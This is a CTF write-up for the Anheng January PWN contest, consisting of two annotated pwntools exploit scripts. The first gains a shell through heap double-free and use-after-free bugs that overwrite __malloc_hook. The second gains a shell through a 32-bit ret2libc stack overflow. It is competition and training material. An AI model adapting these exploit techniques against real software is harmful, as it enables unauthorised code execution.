安恒一月赛 PWN

0x01 pwn1

from pwn import *
#context.log_level="debug"
def add(name,length,note):
    """Menu option 1: create a card on the target.

    Walks the binary's prompts in order: picks "1" at the main menu, sends
    ``name`` raw after "Name:", sends ``length`` as a line after "Len", and
    sends ``note`` raw after "Description:".  Callers must include their own
    trailing newline in ``name`` and ``note`` (the exploit relies on exact
    byte counts there); ``length`` is stringified here.

    Uses the module-level pwntools tube ``p``; returns nothing.
    """
    menu_steps = (
        (True, "4:exit\n", "1"),
        (False, "Name:", name),
        (True, "Len", str(length)),
        (False, "Description:", note),
    )
    for with_newline, prompt, payload in menu_steps:
        # sendlineafter appends "\n"; sendafter ships the bytes untouched.
        send = p.sendlineafter if with_newline else p.sendafter
        send(prompt, payload)

def delete(index):
    """Menu option 2: delete the card at ``index``.

    Picks "2" at the main menu and answers the "Back.\\n>" prompt with the
    index as a line.  Uses the module-level tube ``p``; returns nothing.
    Indices appear to be 1-based in this binary (see the callers).
    """
    for prompt, payload in (("4:exit\n", "2"), ("Back.\n>", str(index))):
        p.sendlineafter(prompt, payload)

def edit(name,length,note,index):
    """Menu option 3: edit the card at ``index``.

    Picks "3" at the main menu, answers "Back.\\n>" with the index, then
    sends ``name`` raw and ``length`` as a line at two successive "?"
    prompts, and ``note`` raw after "Description :".  Note the prompts
    differ from ``add`` ("?" instead of "Name:"/"Len", and "Description :"
    with a space), so the two helpers are not interchangeable.

    Uses the module-level tube ``p``; returns nothing.
    """
    menu_steps = (
        (True, "4:exit\n", "3"),
        (True, "Back.\n>", str(index)),
        (False, "?", name),
        (True, "?", str(length)),
        (False, "Description :", note),
    )
    for with_newline, prompt, payload in menu_steps:
        send = p.sendlineafter if with_newline else p.sendafter
        send(prompt, payload)
# pwn1 exploit driver (Python 2 + pwntools).
# NOTE(review): this is Python 2 only -- `print x` statements and str/p64()
# concatenation -- it will not run unchanged on Python 3 pwntools, where p64()
# returns bytes.  Every libc offset below (0x68, 0x3c4b10, 0xf1147) is tied to
# one specific libc build; re-derive them for the target's libc before reuse.
p=process("./mycard")
#p=remote("101.71.29.5",10006)
# Stage 1: initial heap layout.  Card 3's description carries what look like
# fake chunk headers (size words 0x31, 0x21, 0xb1 at fixed offsets); their
# exact purpose depends on the card struct layout, which is not visible here.
add("1\n",0x40,"1"*0x40)
add("2\n",0x50,"2"*0x50)
add("3\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0xb1)+p32(0))
add("4\n",0x70,"4\n")
add("5\n",0x90,"555\n")
add("6\n",0x60,"666\n")
# Free the 0x90 card and take it back with only a 2-byte description ("5\n"),
# so whatever the allocator left in the freed chunk survives past those bytes.
delete(5)
add("5\n",0x90,"5\n")
# Stage 2: libc leak.  Option 2 (delete) prints the card list; after card 5's
# "Description :5" the script skips 7 bytes, backs out of the menu with an
# empty line, and reads 8 raw bytes as a pointer.
# NOTE(review): the value is treated as a libc address from here on
# (libc_addr-0x68-0x3c4b10 is used as the libc base below); presumably a
# main_arena pointer left in the recycled unsorted-bin chunk -- confirm in gdb.
p.sendlineafter("4:exit\n","2")
p.recvuntil("Description :5")
p.recv(7)
p.send("\n")
libc_addr=u64(p.recv(8))
print hex(libc_addr)
# Stage 3: drop every card (six deletes of index 1 -- presumably the list
# compacts so index 1 is always the first remaining card) and rebuild the same
# layout.  Card 1's name now holds "/bin/sh\x00"; the final one_gadget path
# below does not appear to use it -- possibly a leftover from a system() variant.
for i in range(6):
    delete(1)
add("/bin/sh\x00\n",0x40,"1"*0x40)
add("2\n",0x50,"2"*0x50)
add("3\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0xb1)+p32(0))
add("4\n",0x70,"4\n")
add("5\n",0x90,"555\n")
#add("kirin\n",0x80,"5\n")
# Stage 4: heap leak via double free.  Card 3 is deleted twice; that the second
# delete is accepted (no NULL-out / no double-free check) is the binary's bug.
# The delete listing still shows "[3] Name :"; skip 24 bytes and read a 6-byte
# pointer, zero-extended to 8.
delete(3)
delete(3)
#gdb.attach(p)
p.sendlineafter("4:exit\n","2")
p.recvuntil("[3] Name :")
p.recv(24)
heap_addr=u64(p.recv(6)+"\x00\x00")
print hex(heap_addr)
#p.recv(1024)
#add("kirin\n",4,"1234")
p.send("\n")
# Stage 5: card 3 is still editable after being freed (use-after-free).  Its
# name slot receives two size-like words and a heap pointer (heap_addr+0x100);
# this presumably forges the metadata of a freed card/chunk so the three
# 0x60 allocations below land on controlled memory -- confirm against the struct.
edit(p64(0xb0)+p64(0x20)+p64(heap_addr+0x100)+"\n",0x10,"kirin\n",3)
add("a\n",0x60,"b"*0x10+"\n")
add("a\n",0x60,"a"*0x10+"\n")
add("c\n",0x60,"c"*0x10+"\n")
# Stage 6: rewrite card 3's description with the same fake layout, but the
# last word is now libc_addr-0x68-0x3.  Given stage 7 writes through card 5
# with 3 filler bytes in front, this word looks like another card's buffer
# pointer being hijacked (arbitrary write), not a fastbin fd -- the 3 filler
# bytes then line the 8-byte value up exactly at libc_addr-0x68.
edit("kirin\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(libc_addr-0x68-0x3)+"\n",3)
#gdb.attach(p)
print hex(libc_addr-0x68-0x3)
# Stage 7: write libc_base+0xf1147 at libc_addr-0x68.  If libc_addr is
# main_arena+88 of glibc 2.23 (Ubuntu 16.04, where that is 0x3c4b78 and
# __malloc_hook is 0x3c4b10), then libc_addr-0x68 is __malloc_hook and 0xf1147
# is a one_gadget offset for that build -- TODO confirm with one_gadget.
edit("a"*0x3+p64(libc_addr-0x68-0x3c4b10+0xf1147)+"\x00"*40+"\n",0x20,"\n",5)
# Stage 8: one more allocation goes through malloc, and therefore through the
# (presumably) overwritten hook, which should drop into the gadget.
add("\x00"*60+"\n",0x10,"\x00"*100)
#gdb.attach(p)
p.interactive()

0x02 pwn2

from pwn import *
from time import *
# pwn2 exploit driver (32-bit ret2libc, Python 2 + pwntools).
context.log_level='debug'

# Leftover timing sync for the remote (never enabled; `now` is not defined here).
#while True:
# if int(time())==now+3:
# break
#p=remote("101.71.29.5",10013)
p=process("./rrr")
p.recvuntil(">\n")
# Round 1: stack overflow.  47 filler bytes plus a NUL, then four words:
#   0x804a888 -- a writable-data address (above the GOT at 0x804a018), written
#                in the same slot in both payloads, presumably a saved pointer
#                (or ebp) that must stay sane -- confirm in gdb;
#   0x8048410 -- a low .text address, presumably a PLT stub (puts@plt-like)
#                that prints its argument;
#   0x8048602 -- return address after the print, presumably back into the
#                vulnerable function so round 2 can be sent;
#   0x804a018 -- the GOT entry whose value gets printed.
# NOTE(review): all four addresses are hard-coded, so this assumes no PIE.
payload1="a"*47+"\x00"+p32(0x804a888)+p32(0x8048410)+p32(0x8048602)+p32(0x804a018)
p.sendline(payload1)
# Leaked GOT value -> address of the function to call next: subtract the leaked
# symbol's offset (0x5fca0) and add the target's (0x3ada0).  These match puts
# and system in libc6-i386 2.23-0ubuntu10 -- TODO confirm; the commented
# alternates are for a different build, so re-point them per target.
# NOTE(review): recvuntil("\n")[:4] is fragile -- if the leaked address
# contains a 0x0a byte the read stops early and u32() gets fewer than 4 bytes;
# p.recvn(4) would be the robust form.
s=u32(p.recvuntil("\n")[:4])-0x5fca0+0x3ada0#-0x5f140+0x3a940
# Round 2: same overflow, now the classic i386 frame: function address (s),
# a dummy return address (0), and one argument -- s-0x3ada0+0x15ba0b, which is
# libc_base+0x15ba0b, presumably the "/bin/sh" string in the same libc build.
payload1="a"*47+"\x00"+p32(0x804a888)+p32(s)+p32(0)+p32(s-0x3ada0+0x15ba0b)#-0x3a940+0x15902b)
#gdb.attach(p)
p.sendline(payload1)
p.interactive()